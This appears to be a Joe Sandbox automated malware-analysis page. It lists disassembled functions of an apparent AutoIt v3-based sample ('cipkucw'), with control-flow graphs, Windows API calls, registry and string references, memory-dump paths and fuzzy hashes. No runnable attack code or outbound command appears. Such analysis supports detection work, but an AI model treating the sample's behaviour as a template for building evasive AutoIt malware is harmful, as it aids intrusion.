                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 440 6f3696-6f36ab 441 6f36ad-6f36b0 440->441 442 6f370b-6f370d 440->442 444 6f36b2-6f36b9 441->444 445 6f3711 441->445 442->441 443 6f370f 442->443 446 6f36f6-6f36fe DefWindowProcW 443->446 449 6f36bf-6f36c4 444->449 450 6f378b-6f3793 PostQuitMessage 444->450 447 6f3717-6f371c 445->447 448 733dce-733df6 call 6f2f24 call 70f1c6 445->448 456 6f3704-6f370a 446->456 451 6f371e-6f3721 447->451 452 6f3743-6f376a SetTimer RegisterWindowMessageW 447->452 486 733dfb-733e02 448->486 453 6f36ca-6f36ce 449->453 454 733e3b-733e4f call 75c80c 449->454 457 6f373f-6f3741 450->457 458 6f3727-6f373a KillTimer call 6f388e call 6f572c 451->458 459 733d6f-733d72 451->459 452->457 460 6f376c-6f3777 CreatePopupMenu 452->460 461 6f3795-6f379f call 70fcbb 453->461 462 6f36d4-6f36d9 453->462 454->457 480 733e55 454->480 457->456 458->457 466 733d74-733d78 459->466 467 733daa-733dc9 MoveWindow 459->467 460->457 473 6f37a4 461->473 469 6f36df-6f36e4 462->469 470 733e20-733e27 462->470 474 733d7a-733d7d 466->474 475 733d99-733da5 SetFocus 466->475 467->457 478 6f36ea-6f36f0 469->478 479 6f3779-6f3789 call 6f37a6 469->479 470->446 477 733e2d-733e36 call 751367 470->477 473->457 474->478 482 733d83-733d94 call 6f2f24 474->482 475->457 477->446 478->446 478->486 479->457 480->446 482->457 486->446 487 733e08-733e1b call 6f388e call 6f38f2 486->487 487->446
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006F3690,?,?), ref: 006F36FE
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,006F3690,?,?), ref: 006F372A
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006F374D
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006F3690,?,?), ref: 006F3758
                                        • CreatePopupMenu.USER32 ref: 006F376C
                                        • PostQuitMessage.USER32(00000000), ref: 006F378D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: 0$|$0$|$TaskbarCreated
                                        • API String ID: 129472671-3601538093
                                        • Opcode ID: 3e801d551afc7d43b138c085603a4254aa5772f9aac40555001bfd4e5ffaf831
                                        • Instruction ID: da57eef2f2361f81c969b685f768eaf5095cee80a57a3b1c133246f3f5c12f29
                                        • Opcode Fuzzy Hash: 3e801d551afc7d43b138c085603a4254aa5772f9aac40555001bfd4e5ffaf831
                                        • Instruction Fuzzy Hash: A741E5B12441A8A7DB243B389C4AFB93B5BE700350F10812DFB169A3D2DA7D9F42875D
                                        Function 006F35AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 006F35DE
                                        • RegisterClassExW.USER32(00000030), ref: 006F3608
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3619
                                        • InitCommonControlsEx.COMCTL32(?), ref: 006F3636
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F3646
                                        • LoadIconW.USER32(000000A9), ref: 006F365C
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F366B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: d5c5df6ea361dd75237a8596cff17ccedad60993ea4d83a29ae14ca554207537
                                        • Instruction ID: 845df29dd1312f30ed6547610b1a67f2472969490587a944294b080384093320
                                        • Opcode Fuzzy Hash: d5c5df6ea361dd75237a8596cff17ccedad60993ea4d83a29ae14ca554207537
                                        • Instruction Fuzzy Hash: B421F4B1941348AFDB10DFA4EC89B9DBBB4FB08710F20811AF611B62A0D7B95941CF99
                                        Function 007309FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 497 7309fb-730a2b call 7307cf 500 730a46-730a52 call 7255b1 497->500 501 730a2d-730a38 call 71f656 497->501 507 730a54-730a69 call 71f656 call 71f669 500->507 508 730a6b-730ab4 call 73073a 500->508 506 730a3a-730a41 call 71f669 501->506 515 730d1d-730d23 506->515 507->506 517 730b21-730b2a GetFileType 508->517 518 730ab6-730abf 508->518 521 730b73-730b76 517->521 522 730b2c-730b5d GetLastError call 71f633 CloseHandle 517->522 519 730ac1-730ac5 518->519 520 730af6-730b1c GetLastError call 71f633 518->520 519->520 524 730ac7-730af4 call 73073a 519->524 520->506 527 730b78-730b7d 521->527 528 730b7f-730b85 521->528 522->506 536 730b63-730b6e call 71f669 522->536 524->517 524->520 529 730b89-730bd7 call 7254fa 527->529 528->529 530 730b87 528->530 539 730be7-730c0b call 7304ed 529->539 540 730bd9-730be5 call 73094b 529->540 530->529 536->506 547 730c1e-730c61 539->547 548 730c0d 539->548 540->539 546 730c0f-730c19 call 728a3e 540->546 546->515 549 730c63-730c67 547->549 550 730c82-730c90 547->550 548->546 549->550 552 730c69-730c7d 549->552 553 730c96-730c9a 550->553 554 730d1b 550->554 552->550 553->554 556 730c9c-730ccf CloseHandle call 73073a 553->556 554->515 559 730d03-730d17 556->559 560 730cd1-730cfd GetLastError call 71f633 call 7256c3 556->560 559->554 560->559
                                        APIs
                                          • Part of subcall function 0073073A: CreateFileW.KERNELBASE(00000000,00000000,?,00730AA4,?,?,00000000,?,00730AA4,00000000,0000000C), ref: 00730757
                                        • GetLastError.KERNEL32 ref: 00730B0F
                                        • __dosmaperr.LIBCMT ref: 00730B16
                                        • GetFileType.KERNELBASE(00000000), ref: 00730B22
                                        • GetLastError.KERNEL32 ref: 00730B2C
                                        • __dosmaperr.LIBCMT ref: 00730B35
                                        • CloseHandle.KERNEL32(00000000), ref: 00730B55
                                        • CloseHandle.KERNEL32(?), ref: 00730C9F
                                        • GetLastError.KERNEL32 ref: 00730CD1
                                        • __dosmaperr.LIBCMT ref: 00730CD8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 49e76be5a318d43896fe35d518873912b99ce762ceac111fd4a3bb9035360f09
                                        • Instruction ID: 1d08f1ffc839434b2a6b80740bf2a7983f0841e1dde8cd6ac9195dd0a2427d96
                                        • Opcode Fuzzy Hash: 49e76be5a318d43896fe35d518873912b99ce762ceac111fd4a3bb9035360f09
                                        • Instruction Fuzzy Hash: 0DA12732A041588FEF199F78DC66BAD7BA0AF06324F14415DF8119B3E2CB399D12CB95
                                        Function 006F522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 006F551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 006F5539
                                          • Part of subcall function 006F51BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006F51E1
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006F534B
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00734BD7
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00734C18
                                        • RegCloseKey.ADVAPI32(?), ref: 00734C5A
                                        • _wcslen.LIBCMT ref: 00734CC1
                                        • _wcslen.LIBCMT ref: 00734CD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 98802146-2727554177
                                        • Opcode ID: adba349f442f687f85c03344d4f500d3facf57c91fc9da557223c562af1a8935
                                        • Instruction ID: a778c0ea4c2bf87bfb853808fb39c5b4fbb54a718afd0216f9dbb44ac2cf6ea4
                                        • Opcode Fuzzy Hash: adba349f442f687f85c03344d4f500d3facf57c91fc9da557223c562af1a8935
                                        • Instruction Fuzzy Hash: 0E719E71104344AEC314EF69EC45DABBBE8FF88340F40952EF545871A1EF789A48CB6A
                                        Function 006F345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 006F3465
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 006F3474
                                        • LoadIconW.USER32(00000063), ref: 006F348A
                                        • LoadIconW.USER32(000000A4), ref: 006F349C
                                        • LoadIconW.USER32(000000A2), ref: 006F34AE
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F34C6
                                        • RegisterClassExW.USER32(?), ref: 006F3517
                                          • Part of subcall function 006F35AB: GetSysColorBrush.USER32(0000000F), ref: 006F35DE
                                          • Part of subcall function 006F35AB: RegisterClassExW.USER32(00000030), ref: 006F3608
                                          • Part of subcall function 006F35AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3619
                                          • Part of subcall function 006F35AB: InitCommonControlsEx.COMCTL32(?), ref: 006F3636
                                          • Part of subcall function 006F35AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F3646
                                          • Part of subcall function 006F35AB: LoadIconW.USER32(000000A9), ref: 006F365C
                                          • Part of subcall function 006F35AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F366B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 388d9faffed9db1cee0a69177e8381256bc092985f057bf35f21789896cf45df
                                        • Instruction ID: e775e75839fb5dd2c3944b2b1c482146b63ed0fe0085d6244c6745528c57a3b7
                                        • Opcode Fuzzy Hash: 388d9faffed9db1cee0a69177e8381256bc092985f057bf35f21789896cf45df
                                        • Instruction Fuzzy Hash: 6F218370D40358ABDB109F95EC44FA97FB4FB48710F10802EFA04A22A1D7BD4946CF98
                                        Function 006FCA50 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 006FCE8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: p3|$p3|$p3|$p3|$p5|$p5|$x3|$x3|
                                        • API String ID: 1385522511-119418442
                                        • Opcode ID: 310e2cf14e23443a33c57389a197309e4b005ea9582acce688ab9f42393a4679
                                        • Instruction ID: f79eebec4f3f8ed6b81e9fbb0c3b24e2ef70939517d71c0083a539e83183dd33
                                        • Opcode Fuzzy Hash: 310e2cf14e23443a33c57389a197309e4b005ea9582acce688ab9f42393a4679
                                        • Instruction Fuzzy Hash: 6F32BF75A0020DDFCB14DF58C985EBAB7B6EF44320F55805AEA05AB391C778ED82CB91
                                        Function 006F3AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 845 6f3aa3-6f3ac6 846 6f3acc-6f3b35 call 71019b call 6f7953 call 6fbf07 call 6f7953 * 2 call 6f6e52 845->846 847 734139-73414c call 75a12a 845->847 881 6f3b3b-6f3b48 call 6f6cce call 6f6b12 846->881 882 73456b-73457b call 75a12a 846->882 853 734153-73415b 847->853 855 73416b-734173 853->855 856 73415d-734165 853->856 859 734175-73417c 855->859 860 73417e-734186 855->860 856->855 858 6f3b64-6f3bd3 call 6fbf07 call 6f3a70 call 6fbf07 call 6f557e call 6f41c9 call 6f6bfa 856->858 895 6f3bd9-6f3c48 call 6fbf07 * 2 call 6f694e call 6f7af4 SetCurrentDirectoryW call 6fbd2c * 2 call 71019b call 6f41a6 858->895 896 7341b4-7341bf 858->896 866 7341a6-7341af call 75d4bf 859->866 862 734191-734199 860->862 863 734188-73418f 860->863 862->858 868 73419f-7341a1 862->868 863->866 866->858 868->866 892 6f3b4d-6f3b5e call 6f6afb 881->892 888 734580 882->888 888->888 892->853 892->858 942 6f3c4c-6f3c51 895->942 896->895 898 7341c5-7341f8 call 6f7953 call 6f636d 896->898 909 734502-734519 call 75a12a 898->909 910 7341fe-734225 call 7635cd call 6f63db 898->910 918 6f3da5-6f3df0 call 6fbd2c * 2 call 6f7953 call 6fbd2c call 6f7953 call 7101a4 909->918 910->909 923 73422b-7342a7 call 71016b call 6fbc23 call 6fbb3d 910->923 944 73446f-7344ab call 6fbc23 call 7613a0 call 754a0c call 714d0e 923->944 945 7342ad-7342cf call 6fbc23 923->945 946 6f3c57-6f3c64 call 6fad74 942->946 947 6f3d71-6f3d92 call 6f7953 SetCurrentDirectoryW 942->947 997 7344ad-7344d2 call 6f5c10 call 7101a4 call 761388 944->997 962 7342d1-7342e0 945->962 963 7342e5-7342f0 call 7614a6 945->963 946->947 964 6f3c6a-6f3c86 call 6f4093 call 6f3ff3 946->964 947->918 959 6f3d94-6f3da2 call 71015d call 7101a4 947->959 959->918 968 734401-734414 call 6fbb3d 962->968 979 7342f2-734308 963->979 980 73430d-734318 call 761492 963->980 987 6f3c8c-6f3ca3 call 6f3fb8 call 714cf3 964->987 988 73454e-734566 call 75a12a 964->988 968->945 985 73441a-734424 968->985 979->968 993 73431a-734329 980->993 994 73432e-734339 call 70e607 980->994 990 734457 call 75a486 985->990 991 734426-734434 985->991 1014 6f3cc6-6f3cc9 987->1014 1015 6f3ca5-6f3cc0 call 716755 987->1015 988->947 999 73445c-734469 990->999 991->990 998 734436-734455 call 6f40e0 991->998 993->968 994->968 1009 73433f-73435b call 759f0d 994->1009 997->918 998->999 999->944 999->945 1023 73438a-73438d 1009->1023 1024 73435d-734388 call 6fb25f call 6fbd2c 1009->1024 1019 6f3ccf-6f3cd4 1014->1019 1020 6f3df3-6f3df9 1014->1020 1015->1014 1015->1020 1026 6f3cda-6f3d13 call 6fb25f call 6f3e15 1019->1026 1027 73452f-734537 call 759dd5 1019->1027 1020->1019 1022 6f3dff-73452a 1020->1022 1022->1019 1028 7343c9-7343cc 1023->1028 1029 73438f-7343b5 call 6fb25f call 6f7d27 call 6fbd2c 1023->1029 1068 7343b6-7343c7 call 6fbc23 1024->1068 1052 6f3d15-6f3d2c call 7101a4 call 71015d 1026->1052 1053 6f3d30-6f3d32 1026->1053 1045 73453c-73453f 1027->1045 1038 7343ce-7343d7 call 759e3c 1028->1038 1039 7343ed-7343f1 call 76142e 1028->1039 1029->1068 1050 7344d7-734500 call 75a12a call 7101a4 call 714d0e 1038->1050 1051 7343dd-7343e8 call 7101a4 1038->1051 1047 7343f6-734400 call 7101a4 1039->1047 1054 734545-734549 1045->1054 1055 6f3e08-6f3e10 1045->1055 1047->968 1050->997 1051->945 1052->1053 1066 6f3d38-6f3d3b 1053->1066 1067 6f3e04 1053->1067 1054->1055 1063 6f3d5e-6f3d6b 1055->1063 1063->942 1063->947 1066->1055 1073 6f3d41-6f3d44 1066->1073 1067->1055 1068->1047 1073->1045 1077 6f3d4a-6f3d59 call 6f40e0 1073->1077 1077->1063
                                        APIs
                                          • Part of subcall function 006F7953: CloseHandle.KERNELBASE(?,?,00000000,00733A1C), ref: 006F7973
                                          • Part of subcall function 006F6E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006F3B33,?,00008000), ref: 006F6E80
                                        • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 006F3C17
                                        • _wcslen.LIBCMT ref: 006F3C96
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 006F3D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                        • API String ID: 3350465876-3738523708
                                        • Opcode ID: 511b586760b6066b07cfdf08483bf128f4e3646ffafc3744eb423d2683955bf9
                                        • Instruction ID: 9d5292f86fcfa9d47936949eb06628a46d757ca2cf2b43212b353abd379f7377
                                        • Opcode Fuzzy Hash: 511b586760b6066b07cfdf08483bf128f4e3646ffafc3744eb423d2683955bf9
                                        • Instruction Fuzzy Hash: AF22AD71008348DFD724EF24C885AAFBBE6BF94314F00491DF685972A2DB74EA49CB56
                                        Function 006F2735 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 153comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006F3236
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(00000010,00000000), ref: 006F323E
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006F3249
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006F3254
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(00000011,00000000), ref: 006F325C
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(00000012,00000000), ref: 006F3264
                                          • Part of subcall function 006F318C: RegisterWindowMessageW.USER32(00000004,?,006F2906), ref: 006F31E4
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006F29AC
                                        • OleInitialize.OLE32 ref: 006F29CA
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 007339E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID: 2$(&|$0$|$8e$@(|$$|
                                        • API String ID: 1986988660-1157322980
                                        • Opcode ID: a6edfdc91e3ecbbf266b37b0ce86df903b96fc39d962e57f24689ae0a5e9eb7e
                                        • Instruction ID: f996ae84a008a56f7b84a652159e8e5445fcdf95e33468291847e3e60d81fd6c
                                        • Opcode Fuzzy Hash: a6edfdc91e3ecbbf266b37b0ce86df903b96fc39d962e57f24689ae0a5e9eb7e
                                        • Instruction Fuzzy Hash: 08717CB09013448F8398EF69BD69E263BE1BB48304750D1AED508D72A3EB7C59678F5C
                                        Function 006FF680 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D5|$D5|$D5|$D5|$D5|D5|$Variable must be of type 'Object'.
                                        • API String ID: 0-1044380256
                                        • Opcode ID: e7b6fd1b39775f5da365a878de32c4b643732db767d3765070e50ed601ea7b14
                                        • Instruction ID: fe44d475eea5baf185ccc4444ac93214c9a69e2d0aa6f628fab0235b28a7baf7
                                        • Opcode Fuzzy Hash: e7b6fd1b39775f5da365a878de32c4b643732db767d3765070e50ed601ea7b14
                                        • Instruction Fuzzy Hash: C5C29F71A00219DFCB24DF58C880BBDB7F2BF05310F248169EA55AB391D779AD42DB91
                                        Function 007002F0 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 007015A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: D5|$D5|$D5|$D5|$D5|D5|
                                        • API String ID: 1385522511-2350473382
                                        • Opcode ID: edaf0c38fc5e3edb1fe1ba07050164632748c10280c9ce6f49504ea54767eca5
                                        • Instruction ID: 2b0105a27a2d6f9f9b8b562f115f15d02af4be7102d5944f332bca6cffe88def
                                        • Opcode Fuzzy Hash: edaf0c38fc5e3edb1fe1ba07050164632748c10280c9ce6f49504ea54767eca5
                                        • Instruction Fuzzy Hash: 6BB26D74A08341CFDB24CF18C480B6AB7E1BF96720F648A5DE9858B391D779ED41CB92
                                        Function 006F2A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
